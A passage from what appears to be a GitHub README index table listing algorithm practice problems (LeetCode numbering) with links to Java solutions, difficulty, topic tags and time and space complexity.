II.java](https://github.com/awangdev/LintCode/blob/master/Java/80.Remove%20Duplicates%20from%20Sorted%20Array%20II.java)|Medium|[Array, Two Pointers]|||Java|337| |301|[301. Remove Invalid Parentheses.java](https://github.com/awangdev/LintCode/blob/master/Java/301.%20Remove%20Invalid%20Parentheses.java)|Hard|[BFS, DFS, DP]|||Java|338| |111|[111. Minimum Depth of Binary Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/111.%20Minimum%20Depth%20of%20Binary%20Tree.java)|Easy|[BFS, DFS, Tree]|O(n)|O(n)|Java|339| |1216|[1216. Valid Palindrome III.java](https://github.com/awangdev/LintCode/blob/master/Java/1216.%20Valid%20Palindrome%20III.java)|Hard|[DFS, DP, Memoization, String]|O(n^2)|O(n^2)|Java|340| |7|[7. Reverse Integer.java](https://github.com/awangdev/LintCode/blob/master/Java/7.%20Reverse%20Integer.java)|Easy|[Math]|O(n)|O(1)|Java|341| |5|[5. Longest Palindromic Substring.java](https://github.com/awangdev/LintCode/blob/master/Java/5.%20Longest%20Palindromic%20Substring.java)|Medium|[DP, String]|O(n^2)|O(n^2)|Java|342| |303|[303. Range Sum Query - Immutable.java](https://github.com/awangdev/LintCode/blob/master/Java/303.%20Range%20Sum%20Query%20-%20Immutable.java)|Easy|[DP, PreSum]|O(1) query, O(n) setup|O(n)|Java|343| |674|[674. Longest Continuous Increasing Subsequence.java](https://github.com/awangdev/LintCode/blob/master/Java/674.%20Longest%20Continuous%20Increasing%20Subsequence.java)|Easy|[Array, Coordinate DP, DP, Sliding Window]|O(n)|O(1)|Java|344| |1007|[1007. Minimum Domino Rotations For Equal Row.java](https://github.com/awangdev/LintCode/blob/master/Java/1007.%20Minimum%20Domino%20Rotations%20For%20Equal%20Row.java)|Medium|[Array, Greedy]|O(n)|O(1)|Java|345| |485|[485. Max Consecutive Ones.java](https://github.com/awangdev/LintCode/blob/master/Java/485.%20Max%20Consecutive%20Ones.java)|Easy|[Array, Basic Implementation]|O(n)|O(1)|Java|346| |896|[896. Monotonic Array.java](https://github.com/awangdev/LintCode/blob/master/Java/896.%20Monotonic%20Array.java)|Easy|[Array]|||Java|347| |207|[207. Course Schedule.java](https://github.com/awangdev/LintCode/blob/master/Java/207.%20Course%20Schedule.java)|Medium|[BFS, Backtracking, DFS, Graph, Topological Sort]|O(n)|O(n)|Java|348| |327|[327. Count of Range Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/327.%20Count%20of%20Range%20Sum.java)|Hard|[BIT, Divide and Conquer, Merge Sort, PreSum, Segment Tree]|O(nlogn)|O(n)|Java|349| |987|[987. Vertical Order Traversal of a Binary Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/987.%20Vertical%20Order%20Traversal%20of%20a%20Binary%20Tree.java)|Medium|[BFS, Binary Tree, DFS, Hash Table, Tree]|||Java|350| |26|[26.Remove Duplicates from Sorted Array.java](https://github.com/awangdev/LintCode/blob/master/Java/26.Remove%20Duplicates%20from%20Sorted%20Array.java)|Easy|[Array, Two Pointers]|||Java|351| |429|[429. N-ary Tree Level Order Traversal.java](https://github.com/awangdev/LintCode/blob/master/Java/429.%20N-ary%20Tree%20Level%20Order%20Traversal.java)|Medium|[BFS, Tree]|O(n)|O(n)|Java|352| |275|[275. H-Index II.java](https://github.com/awangdev/LintCode/blob/master/Java/275.%20H-Index%20II.java)|Medium|[Binary Search]|O(logN)|O(1) extra|Java|353| |204|[204. Count Primes.java](https://github.com/awangdev/LintCode/blob/master/Java/204.%20Count%20Primes.java)|Easy|[Hash Table, Math]|||Java|354| |58|[58. Length of Last Word.java](https://github.com/awangdev/LintCode/blob/master/Java/58.%20Length%20of%20Last%20Word.java)|Easy|[String]|||Java|355| |496|[496. Next Greater Element I.java](https://github.com/awangdev/LintCode/blob/master/Java/496.%20Next%20Greater%20Element%20I.java)|Easy|[Hash Table, Stack]|O(n)|O(n)|Java|356| |41|[41. First Missing Positive.java](https://github.com/awangdev/LintCode/blob/master/Java/41.%20First%20Missing%20Positive.java)|Hard|[Analysis, Array, Edge Case]|O(n)|O(1)|Java|357| |694|[694. Number of Distinct Islands.java](https://github.com/awangdev/LintCode/blob/master/Java/694.%20Number%20of%20Distinct%20Islands.java)|Medium|[DFS, Hash Table]|O(n)|O(n)|Java|358| |717|[717. 1-bit and 2-bit Characters.java](https://github.com/awangdev/LintCode/blob/master/Java/717.%201-bit%20and%202-bit%20Characters.java)|Easy|[Array]|||Java|359| |53|[53. Maximum Subarray.java](https://github.com/awangdev/LintCode/blob/master/Java/53.%20Maximum%20Subarray.java)|Easy|[Array, DFS, DP, Divide and Conquer, PreSum, Sequence DP, Subarray]|O(n)|O(n), O(1) rolling array|Java|360| |152|[152. Maximum Product Subarray.java](https://github.com/awangdev/LintCode/blob/master/Java/152.%20Maximum%20Product%20Subarray.java)|Medium|[Array, DP, PreProduct, Subarray]|O(n)|O(1)|Java|361| |199|[199. Binary Tree Right Side View.java](https://github.com/awangdev/LintCode/blob/master/Java/199.%20Binary%20Tree%20Right%20Side%20View.java)|Medium|[BFS, DFS, Tree]|O(n)|O(n)|Java|362| |259|[259. 3Sum Smaller.java](https://github.com/awangdev/LintCode/blob/master/Java/259.%203Sum%20Smaller.java)|Medium|[Array, Sort, Two Pointers]|||Java|363| |977|[977. Squares of a Sorted Array.java](https://github.com/awangdev/LintCode/blob/master/Java/977.%20Squares%20of%20a%20Sorted%20Array.java)|Easy|[Array, Two Pointers]|O(n)|O(n)|Java|364| |824|[824. Goat Latin.java](https://github.com/awangdev/LintCode/blob/master/Java/824.%20Goat%20Latin.java)|Easy|[Basic Implementation, String]|O(n)|O(1)|Java|365| |308|[308. Range Sum Query 2D - Mutable.java](https://github.com/awangdev/LintCode/blob/master/Java/308.%20Range%20Sum%20Query%202D%20-%20Mutable.java)|Hard|[Binary Indexed Tree, Segment Tree]|build(n), update(logn), rangeRuery(logn + k)|O(n)|Java|366| |1203|[1203. Sort Items by Groups Respecting Dependencies.java](https://github.com/awangdev/LintCode/blob/master/Java/1203.%20Sort%20Items%20by%20Groups%20Respecting%20Dependencies.java)|Hard|[BFS, DFS, Graph, Topological Sort]|O(V + E) to traverse the graph, #nodes + #edges|O(V + E)|Java|367| |1153|[1153. String Transforms Into Another String.java](https://github.com/awangdev/LintCode/blob/master/Java/1153.%20String%20Transforms%20Into%20Another%20String.java)|Hard|[Graph]|O(n)|O(n)|Java|368| |1008|[1008. Construct Binary Search Tree from Preorder Traversal.java](https://github.com/awangdev/LintCode/blob/master/Java/1008.%20Construct%20Binary%20Search%20Tree%20from%20Preorder%20Traversal.java)|Medium|[DFS, Tree]|O(n)|O(n)|Java|369| |151|[151. Reverse Words in a String.java](https://github.com/awangdev/LintCode/blob/master/Java/151.%20Reverse%20Words%20in%20a%20String.java)|Medium|[String]|O(n)||Java|370| |855|[855. Exam Room.java](https://github.com/awangdev/LintCode/blob/master/Java/855.%20Exam%20Room.java)|Medium|[PriorityQueue, Sort, TreeMap, TreeSet]|O(logn)|O(n)|Java|371| |31|[31. Next Permutation.java](https://github.com/awangdev/LintCode/blob/master/Java/31.%20Next%20Permutation.java)|Medium|[Array, Permutation]|O(n)|O(1)|Java|372| |518|[518. Coin Change 2.java](https://github.com/awangdev/LintCode/blob/master/Java/518.%20Coin%20Change%202.java)|Medium|[Backpack DP, DP]|O(n)|O(n)|Java|373| |405|[405. Convert a Number to Hexadecimal.java](https://github.com/awangdev/LintCode/blob/master/Java/405.%20Convert%20a%20Number%20to%20Hexadecimal.java)|Easy|[Bit Manipulation]|||Java|374| |850|[850. Rectangle Area II.java](https://github.com/awangdev/LintCode/blob/master/Java/850.%20Rectangle%20Area%20II.java)|Hard|[Segment Tree, Sweep Line]|O(n^2)|O(n)|Java|375| |515|[515. Find Largest Value in Each Tree Row.java](https://github.com/awangdev/LintCode/blob/master/Java/515.%20Find%20Largest%20Value%20in%20Each%20Tree%20Row.java)|Medium|[BFS, DFS, Tree]|O(n)|O(n)|Java|376| |253|[253. Meeting Rooms II.java](https://github.com/awangdev/LintCode/blob/master/Java/253.%20Meeting%20Rooms%20II.java)|Medium|[Greedy, Heap, PriorityQueue, Sort, Sweep Line]|O(nlogn)|O(n)|Java|377| |1161|[1161. Maximum Level Sum of a Binary Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/1161.%20Maximum%20Level%20Sum%20of%20a%20Binary%20Tree.java)|Medium|[BFS, DFS, Graph]|O(n) visit all nodes|O(n)|Java|378| |509|[509. Fibonacci Number.java](https://github.com/awangdev/LintCode/blob/master/Java/509.%20Fibonacci%20Number.java)|Easy|[DP, Math, Memoization]|||Java|379| |221|[221. Maximal Square.java](https://github.com/awangdev/LintCode/blob/master/Java/221.%20Maximal%20Square.java)|Medium|[Coordinate DP, DP]|O(mn)|O(mn)|Java|380| |131|[131. Palindrome Partitioning.java](https://github.com/awangdev/LintCode/blob/master/Java/131.%20Palindrome%20Partitioning.java)|Medium|[Backtracking, DFS]|O(2^n)|O(n^2)|Java|381| |136|[136. Single Number.java](https://github.com/awangdev/LintCode/blob/master/Java/136.%20Single%20Number.java)|Easy|[Bit Manipulation, Hash Table]|||Java|382| |222|[222. Count Complete Tree Nodes.java](https://github.com/awangdev/LintCode/blob/master/Java/222.%20Count%20Complete%20Tree%20Nodes.java)|Medium|[Binary Search, DFS, Tree]|O(n)|O(h)|Java|383| |257|[257. Binary Tree Paths.java](https://github.com/awangdev/LintCode/blob/master/Java/257.%20Binary%20Tree%20Paths.java)|Easy|[Backtracking, Binary Tree, DFS]|O(n)|O(nlogn)|Java|384| |543|[543. Diameter of Binary Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/543.%20Diameter%20of%20Binary%20Tree.java)|Easy|[Tree]|O(n) when non-balanced|O(n) when non-balanced|Java|385| |398|[398. Random Pick Index.java](https://github.com/awangdev/LintCode/blob/master/Java/398.%20Random%20Pick%20Index.java)|Medium|[Reservior Sampling]|O(n)|O(n) for input int[], O(1) extra space used|Java|386| |238|[238. Product of Array Except Self.java](https://github.com/awangdev/LintCode/blob/master/Java/238.%20Product%20of%20Array%20Except%20Self.java)|Medium|[Array, PreProduct]|O(n)|O(1)|Java|387| |1060|[1060. Missing Element in Sorted Array.java](https://github.com/awangdev/LintCode/blob/master/Java/1060.%20Missing%20Element%20in%20Sorted%20Array.java)|Medium|[Binary Search]|O(logn)|O(1)|Java|388| |1048|[1048. Longest String Chain.java](https://github.com/awangdev/LintCode/blob/master/Java/1048.%20Longest%20String%20Chain.java)|Medium|[Bucket Sort, DP, Hash Table, Sort]|O(n)|O(n)|Java|389| |67|[67. Add Binary.java](https://github.com/awangdev/LintCode/blob/master/Java/67.%20Add%20Binary.java)|Easy|[Math, String, Two Pointers]|||Java|390| |299|[299. Bulls and Cows.java](https://github.com/awangdev/LintCode/blob/master/Java/299.%20Bulls%20and%20Cows.java)|Medium|[Hash Table]|O(n)|O(n)|Java|391| |557|[557. Reverse Words in a String III.java](https://github.com/awangdev/LintCode/blob/master/Java/557.%20Reverse%20Words%20in%20a%20String%20III.java)|Easy|[String]|||Java|392| |203|[203. Remove Linked List Elements.java](https://github.com/awangdev/LintCode/blob/master/Java/203.%20Remove%20Linked%20List%20Elements.java)|Easy|[Linked List]|||Java|393| |1219|[1219. Path with Maximum Gold.java](https://github.com/awangdev/LintCode/blob/master/Java/1219.%20Path%20with%20Maximum%20Gold.java)|Medium|[Backtracking, DFS]|O(n^2)|O(n) recursive depth|Java|394| |266|[266. Palindrome Permutation.java](https://github.com/awangdev/LintCode/blob/master/Java/266.%20Palindrome%20Permutation.java)|Easy|[Hash Table]|O(n)|O(n)|Java|395| |62|[62. Unique Path.java](https://github.com/awangdev/LintCode/blob/master/Java/62.%20Unique%20Path.java)|Medium|[Array, Coordinate DP, DP]|O(mn)|O(mn), rolling array O(n)|Java|396| |1091|[1091. Shortest Path in Binary Matrix.java](https://github.com/awangdev/LintCode/blob/master/Java/1091.%20Shortest%20Path%20in%20Binary%20Matrix.java)|Medium|[BFS]|O(n^2)||Java|397| |1110|[1110. Delete Nodes And Return Forest.java](https://github.com/awangdev/LintCode/blob/master/Java/1110.%20Delete%20Nodes%20And%20Return%20Forest.java)|Medium|[DFS, Divide and Conquer, Tree]|O(n)|O(logn)|Java|398| |1249|[1249. Minimum Remove to Make Valid Parentheses.java](https://github.com/awangdev/LintCode/blob/master/Java/1249.%20Minimum%20Remove%20to%20Make%20Valid%20Parentheses.java)|Medium|[Stack, String]|O(n)|O(n)|Java|399| |15|[15. 3Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/15.%203Sum.java)|Medium|[Array, Sort, Two Pointers]|O(n^2)||Java|400| |311|[311. Sparse Matrix Multiplication.java](https://github.com/awangdev/LintCode/blob/master/Java/311.%20Sparse%20Matrix%20Multiplication.java)|Medium|[Hash Table]|O(mnk), where `m = A.row`, `n = B.col`, `k = A.col = B.row`|O(1) extra|Java|401| |339|[339. Nested List Weight Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/339.%20Nested%20List%20Weight%20Sum.java)|Easy|[BFS, DFS, NestedInteger]|O(n)|O(h), h = levels|Java|402| |322|[322. Coin Change.java](https://github.com/awangdev/LintCode/blob/master/Java/322.%20Coin%20Change.java)|Medium|[Backpack DP, DFS, DP, Memoization]|O(n * S)|O(S)|Java|403| |55|[55. Jump Game.java](https://github.com/awangdev/LintCode/blob/master/Java/55.%20Jump%20Game.java)|Medium|[Array, DP, Greedy]|O(n)|O(1)|Java|404| |173|[173. Binary Search Tree Iterator.java](https://github.com/awangdev/LintCode/blob/master/Java/173.%20Binary%20Search%20Tree%20Iterator.java)|Medium|[BST, Design, Stack, Tree]|O(1) average|O(h)|Java|405| |140|[140. Word Break II.java](https://github.com/awangdev/LintCode/blob/master/Java/140.%20Word%20Break%20II.java)|Hard|[Backtracking, DFS, DP, Hash Table, Memoization]|O(n!)|O(n!)|Java|406| |51|[51. N-Queens.java](https://github.com/awangdev/LintCode/blob/master/Java/51.%20N-Queens.java)|Hard|[Backtracking]|O(n!)|O(n^2)|Java|407| |875|[875. Koko Eating Bananas.java](https://github.com/awangdev/LintCode/blob/master/Java/875.%20Koko%20Eating%20Bananas.java)|Medium|[Binary Search]|O(n*logM)|O(1)|Java|408| |189|[189. Rotate Array.java](https://github.com/awangdev/LintCode/blob/master/Java/189.%20Rotate%20Array.java)|Easy|[Array, Rotation]|||Java|409| |19|[19. Remove Nth Node From End of List.java](https://github.com/awangdev/LintCode/blob/master/Java/19.%20Remove%20Nth%20Node%20From%20End%20of%20List.java)|Medium|[Linked List, Two Pointers]|O(n)|O(1)|Java|410| |134|[134. Gas Station.java](https://github.com/awangdev/LintCode/blob/master/Java/134.%20Gas%20Station.java)|Medium|[Greedy]|O(n)|O(1)|Java|411| |119|[119. Pascal's Triangle II.java](https://github.com/awangdev/LintCode/blob/master/Java/119.%20Pascal's%20Triangle%20II.java)|Easy|[Array, Basic Implementation]|O(k^2), pascal triangle size|O(k^2)|Java|412| |1197|[1197. Minimum Knight Moves.java](https://github.com/awangdev/LintCode/blob/master/Java/1197.%20Minimum%20Knight%20Moves.java)|Medium|[BFS]|O(8^n)|O(8^n)|Java|413| |493|[493. Reverse Pairs.java](https://github.com/awangdev/LintCode/blob/master/Java/493.%20Reverse%20Pairs.java)|Medium|[BST, Binary Indexed Tree, Divide and Conquer, Merge Sort, Segment Tree]|||Java|414| |1306|[1306. Jump Game III.java](https://github.com/awangdev/LintCode/blob/master/Java/1306.%20Jump%20Game%20III.java)|Medium|[BFS, Graph]|O(n)|O(n)|Java|415| |305|[305. Number of Islands II.java](https://github.com/awangdev/LintCode/blob/master/Java/305.%20Number%20of%20Islands%20II.java)|Hard|[Union Find]|O(k * log(mn))|O(mn)|Java|416| |206|[206. Reverse Linked List.java](https://github.com/awangdev/LintCode/blob/master/Java/206.%20Reverse%20Linked%20List.java)|Easy|[Linked List]|||Java|417| |277|[277. Find the Celebrity.java](https://github.com/awangdev/LintCode/blob/master/Java/277.%20Find%20the%20Celebrity.java)|Medium|[Adjacency Matrix, Array, Graph, Greedy, Pruning]|O(n)|O(1)|Java|418| |741|[741. Cherry Pickup.java](https://github.com/awangdev/LintCode/blob/master/Java/741.%20Cherry%20Pickup.java)|Hard|[DFS, DP]|O(n^3)|O(n^3), memo size|Java|419| |168|[168. Excel Sheet Column Title.java](https://github.com/awangdev/LintCode/blob/master/Java/168.%20Excel%20Sheet%20Column%20Title.java)|Easy|[Math]|O(n)|O(1)|Java|420| |104|[104. Maximum Depth of Binary Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/104.%20Maximum%20Depth%20of%20Binary%20Tree.java)|Easy|[DFS, Tree]|||Java|421| |349|[349. Intersection of Two Arrays.java](https://github.com/awangdev/LintCode/blob/master/Java/349.%20Intersection%20of%20Two%20Arrays.java)|Easy|[Binary Search, Hash Table, Sort, Two Pointers]|O(m + n)|O(m + n)|Java|422| |443|[443. String Compression.java](https://github.com/awangdev/LintCode/blob/master/Java/443.%20String%20Compression.java)|Easy|[Basic Implementation, String]|||Java|423| |297|[297. Serialize and Deserialize Binary Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/297.%20Serialize%20and%20Deserialize%20Binary%20Tree.java)|Hard|[BFS, DFS, Deque, Design, Divide and Conquer, Tree]|O(n)|O(n)|Java|424| |46|[46. Permutations.java](https://github.com/awangdev/LintCode/blob/master/Java/46.%20Permutations.java)|Medium|[BFS, Backtracking, DFS, Permutation]|O(n!)|O(n!)|Java|425| |844|[844. Backspace String Compare.java](https://github.com/awangdev/LintCode/blob/master/Java/844.%20Backspace%20String%20Compare.java)|Easy|[Stack, Two Pointers]|O(n)|O(1)|Java|426| |9|[9. Palindrome Number.java](https://github.com/awangdev/LintCode/blob/master/Java/9.%20Palindrome%20Number.java)|Easy|[Math]|||Java|427| |1094|[1094. Car Pooling.java](https://github.com/awangdev/LintCode/blob/master/Java/1094.%20Car%20Pooling.java)|Medium|[Greedy, Heap, PriorityQueue, Sort]|O(n)|O(1) only use bucket size 1000|Java|428| |245|[245. Shortest Word Distance III.java](https://github.com/awangdev/LintCode/blob/master/Java/245.%20Shortest%20Word%20Distance%20III.java)|Medium|[Array, Design, Hash Table, Two Pointers]|O(n)|O(1)|Java|429| |1117|[1117. Building H2O.java](https://github.com/awangdev/LintCode/blob/master/Java/1117.%20Building%20H2O.java)|Medium|[Lock, Semaphore, Thread]|||Java|430| |973|[973. K Closest Points to Origin.java](https://github.com/awangdev/LintCode/blob/master/Java/973.%20K%20Closest%20Points%20to%20Origin.java)|Medium|[Divide and Conquer, Heap, Sort]|O(klogk)|O(k)|Java|431| |771|[771. Jewels and Stones.java](https://github.com/awangdev/LintCode/blob/master/Java/771.%20Jewels%20and%20Stones.java)|Easy|[Hash Table]|O(n)|O(n)|Java|432| |200|[200. Number of Islands.java](https://github.com/awangdev/LintCode/blob/master/Java/200.%20Number%20of%20Islands.java)|Medium|[BFS, DFS, Matrix DFS, Union Find]|O(n)|O(n)|Java|433| |141|[141. Linked List Cycle.java](https://github.com/awangdev/LintCode/blob/master/Java/141.%20Linked%20List%20Cycle.java)|Easy|[Cycle Detection, Linked List, Slow Fast Pointer, Two Pointers]|O(n)|O(1)|Java|434| |567|[567. Permutation in String.java](https://github.com/awangdev/LintCode/blob/master/Java/567.%20Permutation%20in%20String.java)|Medium|[Sliding Window, Two Pointers]|O(m + n)|O(1)|Java|435| |727|[727. Minimum Window Subsequence.java](https://github.com/awangdev/LintCode/blob/master/Java/727.%20Minimum%20Window%20Subsequence.java)|Hard|[DP, Hash Table, Sliding Window, String, Two Pointers]|O(n^2)|O(1)|Java|436| |158|[158. Read N Characters Given Read4 II - Call multiple times.java](https://github.com/awangdev/LintCode/blob/master/Java/158.%20Read%20N%20Characters%20Given%20Read4%20II%20-%20Call%20multiple%20times.java)|Hard|[Enumeration, String]|O(n)|O(n)|Java|437| |369|[369. Plus One Linked List.java](https://github.com/awangdev/LintCode/blob/master/Java/369.%20Plus%20One%20Linked%20List.java)|Medium|[Linked List]|O(n)|O(1)|Java|438| |211|[211. Add and Search Word - Data structure design.java](https://github.com/awangdev/LintCode/blob/master/Java/211.%20Add%20and%20Search%20Word%20-%20Data%20structure%20design.java)|Medium|[Backtracking, Design, Trie]|O(n) to search and to add word|< O(mn), depends on the input. m = # of words|Java|439| |43|[43. Multiply Strings.java](https://github.com/awangdev/LintCode/blob/master/Java/43.%20Multiply%20Strings.java)|Medium|[Math, String]|O(mn)|O(mn)|Java|440| |621|[621. Task Scheduler.java](https://github.com/awangdev/LintCode/blob/master/Java/621.%20Task%20Scheduler.java)|Medium|[Array, Enumeration, Greedy, PriorityQueue, Queue]|O(n)|O(1)|Java|441| |680|[680. Valid Palindrome II.java](https://github.com/awangdev/LintCode/blob/master/Java/680.%20Valid%20Palindrome%20II.java)|Easy|[String]|||Java|442| |295|[295. Find Median from Data Stream.java](https://github.com/awangdev/LintCode/blob/master/Java/295.%20Find%20Median%20from%20Data%20Stream.java)|Hard|[Design, Heap, MaxHeap, MinHeap]|O(1) get, O(logn) addNum|O(n)|Java|443| |70|[70. Climbing Stairs.java](https://github.com/awangdev/LintCode/blob/master/Java/70.%20Climbing%20Stairs.java)|Easy|[DP, Memoization, Sequence DP]|||Java|444| |747|[747. Largest Number At Least Twice of Others.java](https://github.com/awangdev/LintCode/blob/master/Java/747.%20Largest%20Number%20At%20Least%20Twice%20of%20Others.java)|Easy|[Array]|||Java|445| |315|[315. Count of Smaller Numbers After Self.java](https://github.com/awangdev/LintCode/blob/master/Java/315.%20Count%20of%20Smaller%20Numbers%20After%20Self.java)|Hard|[BST, Binary Indexed Tree, Binary Search, Divide and Conquer, Segment Tree]|O(nlogn)|O(n)|Java|446| |239|[239. Sliding Window Maximum.java](https://github.com/awangdev/LintCode/blob/master/Java/239.%20Sliding%20Window%20Maximum.java)|Hard|[Deque, Heap, Sliding Window]|O(n)|O(n)|Java|447| |47|[47. Permutations II.java](https://github.com/awangdev/LintCode/blob/master/Java/47.%20Permutations%20II.java)|Medium|[Backtracking, DFS]|||Java|448| |332|[332. Reconstruct Itinerary.java](https://github.com/awangdev/LintCode/blob/master/Java/332.%20Reconstruct%20Itinerary.java)|Medium|[Backtracking, DFS, Graph]|O(n^n)|O(m)|Java|449| |88|[88. Search in Rotated Sorted Array II.java](https://github.com/awangdev/LintCode/blob/master/Java/88.%20Search%20in%20Rotated%20Sorted%20Array%20II.java)|Medium|[Array, Binary Search]|O(logn), worst O(n)|O(1)|Java|450| |561|[561. Array Partition I.java](https://github.com/awangdev/LintCode/blob/master/Java/561.%20Array%20Partition%20I.java)|Easy|[Array]|O(nlogn)|O(1)|Java|451| |387|[387. First Unique Character in a String.java](https://github.com/awangdev/LintCode/blob/master/Java/387.%20First%20Unique%20Character%20in%20a%20String.java)|Easy|[Hash Table, String]|O(n)|O(256) = O(1)|Java|452| |345|[345. Reverse Vowels of a String.java](https://github.com/awangdev/LintCode/blob/master/Java/345.%20Reverse%20Vowels%20of%20a%20String.java)|Easy|[String, Two Pointers]|||Java|453| |39|[39. Combination Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/39.%20Combination%20Sum.java)|Medium|[Array, Backtracking, Combination, DFS]|O(k * 2^n), k = avg rst length|O(k) stack depth, if not counting result size|Java|454| |10|[10. Regular Expression Matching.java](https://github.com/awangdev/LintCode/blob/master/Java/10.%20Regular%20Expression%20Matching.java)|Hard|[Backtracking, DP, Double Sequence DP, Sequence DP, String]|||Java|455| |367|[367. Valid Perfect Square.java](https://github.com/awangdev/LintCode/blob/master/Java/367.%20Valid%20Perfect%20Square.java)|Easy|[Binary Search, Math]|O(logN)|O(1)|Java|456| |270|[270. Closest Binary Search Tree Value.java](https://github.com/awangdev/LintCode/blob/master/Java/270.%20Closest%20Binary%20Search%20Tree%20Value.java)|Easy|[BST, Binary Search, Tree]|O(logn)|O(1)|Java|457| |28|[28. Implement strStr().java](https://github.com/awangdev/LintCode/blob/master/Java/28.%20Implement%20strStr().java)|Easy|[String, Two Pointers]|||Java|458| |1106|[1106. Parsing A Boolean Expression.java](https://github.com/awangdev/LintCode/blob/master/Java/1106.%20Parsing%20A%20Boolean%20Expression.java)|Hard|[DFS, Stack, String]|||Java|459| |144|[144. Binary Tree Preorder Traversal.java](https://github.com/awangdev/LintCode/blob/master/Java/144.%20Binary%20Tree%20Preorder%20Traversal.java)|Medium|[BFS, DFS, Stack, Tree]|O(n)|O(n)|Java|460| |852|[852. Peak Index in a Mountain Array.java](https://github.com/awangdev/LintCode/blob/master/Java/852.%20Peak%20Index%20in%20a%20Mountain%20Array.java)|Easy|[Binary Search]|O(logn)|O(1)|Java|461| |146|[146. LRU Cache.java](https://github.com/awangdev/LintCode/blob/master/Java/146.%20LRU%20Cache.java)|Medium|[Design, Doubly Linked List, Hash Table, Linked List]|O(1)|O(1)|Java|462| |110|[110. Balanced Binary Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/110.%20Balanced%20Binary%20Tree.java)|Easy|[DFS, Tree]|||Java|463| |1040|[1040. Moving Stones Until Consecutive II.java](https://github.com/awangdev/LintCode/blob/master/Java/1040.%20Moving%20Stones%20Until%20Consecutive%20II.java)|Medium|[Array, Sliding Window]|O(nlogn)|O(n)|Java|464| |246|[246. Strobogrammatic Number.java](https://github.com/awangdev/LintCode/blob/master/Java/246.%20Strobogrammatic%20Number.java)|Easy|[Enumeration, Hash Table, Math, Two Pointers]|O(n)|O(1)|Java|465| |100|[100. Same Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/100.%20Same%20Tree.java)|Easy|[BFS, DFS, Tree]|O(n)|O(logn)|Java|466| |307|[307. Range Sum Query - Mutable.java](https://github.com/awangdev/LintCode/blob/master/Java/307.%20Range%20Sum%20Query%20-%20Mutable.java)|Medium|[Binary Indexed Tree, Segment Tree]|build O(n), query (logn +k), update O(logn)|O(n)|Java|467| |88|[88. Merge Sorted Array.java](https://github.com/awangdev/LintCode/blob/master/Java/88.%20Merge%20Sorted%20Array.java)|Easy|[Array, Two Pointers]|O(n)|O(1)|Java|468| |319|[319. Bulb Switcher.java](https://github.com/awangdev/LintCode/blob/master/Java/319.%20Bulb%20Switcher.java)|Medium|[Brainteaser, Math]|O(1)|O(1)|Java|469| |112|[112. Path Sum.java](https://github.com/awangdev/LintCode/blob/master/Java/112.%20Path%20Sum.java)|Easy|[DFS, Tree]|||Java|470| |463|[463. Island Perimeter.java](https://github.com/awangdev/LintCode/blob/master/Java/463.%20Island%20Perimeter.java)|Easy|[Hash Table]|O(n)||Java|471| |170|[170. Two Sum III - Data structure design.java](https://github.com/awangdev/LintCode/blob/master/Java/170.%20Two%20Sum%20III%20-%20Data%20structure%20design.java)|Easy|[Design, Hash Table, Memoization]|O(n)|O(n)|Java|472| |122|[122. Best Time to Buy and Sell Stock II.java](https://github.com/awangdev/LintCode/blob/master/Java/122.%20Best%20Time%20to%20Buy%20and%20Sell%20Stock%20II.java)|Easy|[Array, DP, Greedy, Sequence DP, Status DP]|O(n)|O(1) greedy, O(n) dp|Java|473| |715|[715. Range Module.java](https://github.com/awangdev/LintCode/blob/master/Java/715.%20Range%20Module.java)|Hard|[Segment Tree, TreeSet]|query O(logn), update O(n)|O(n)|Java|474| |12|[12. Integer to Roman.java](https://github.com/awangdev/LintCode/blob/master/Java/12.%20Integer%20to%20Roman.java)|Medium|[Basic Implementation, Math, String]|O(n)|O(n)|Java|475| |14|[14. Longest Common Prefix.java](https://github.com/awangdev/LintCode/blob/master/Java/14.%20Longest%20Common%20Prefix.java)|Easy|[String]|||Java|476| |243|[243. Shortest Word Distance.java](https://github.com/awangdev/LintCode/blob/master/Java/243.%20Shortest%20Word%20Distance.java)|Easy|[Array, Two Pointers]|O(n)|O(1)|Java|477| |414|[414. Third Maximum Number.java](https://github.com/awangdev/LintCode/blob/master/Java/414.%20Third%20Maximum%20Number.java)|Easy|[Array, PriorityQueue]|||Java|478| |1267|[1267. Count Servers that Communicate.java](https://github.com/awangdev/LintCode/blob/master/Java/1267.%20Count%20Servers%20that%20Communicate.java)|Medium|[Array, Graph]|O(mn)|O(m + n)|Java|479| |20|[20. Valid Parentheses.java](https://github.com/awangdev/LintCode/blob/master/Java/20.%20Valid%20Parentheses.java)|Easy|[Stack, String]|O(n)|O(n)|Java|480| |893|[893. Groups of Special-Equivalent Strings.java](https://github.com/awangdev/LintCode/blob/master/Java/893.%20Groups%20of%20Special-Equivalent%20Strings.java)|Easy|[Basic Implementation, String]|||Java|481| |427|[427. Construct Quad Tree.java](https://github.com/awangdev/LintCode/blob/master/Java/427.%20Construct%20Quad%20Tree.java)|Medium|[Tree]|O(n^2)|O(n^2)|Java|482| |981|[981. Time Based Key-Value Store.java](https://github.com/awangdev/LintCode/blob/master/Java/981.%20Time%20Based%20Key-Value%20Store.java)|Medium|[Binary Search, Hash Table, TreeMap]|set O(1), get(logn)|O(n)|Java|483| |169|[169. Majority Element.java](https://github.com/awangdev/LintCode/blob/master/Java/169.%20Majority%20Element.java)|Easy|[Array, Bit Manipulation, Divide and Conquer, Moore Voting, Sort]|O(n)|O(1)|Java|484| |234|[234. Palindrome Linked List.java](https://github.com/awangdev/LintCode/blob/master/Java/234.%20Palindrome%20Linked%20List.java)|Easy|[Linked List, Two Pointers]|O(n)|O(1)|Java|485| |202|[202. Happy Number.java](https://github.com/awangdev/LintCode/blob/master/Java/202.%20Happy%20Number.java)|Easy|[Hash Table, Math]|O(m), m iterations|O(m), m number in set|Java|486| |69|[69. Sqrt(x).java](https://github.com/awangdev/LintCode/blob/master/Java/69.%20Sqrt(x).java)|Easy|[Binary Search, Math]|||Java|487| |876|[876. Middle of Linked 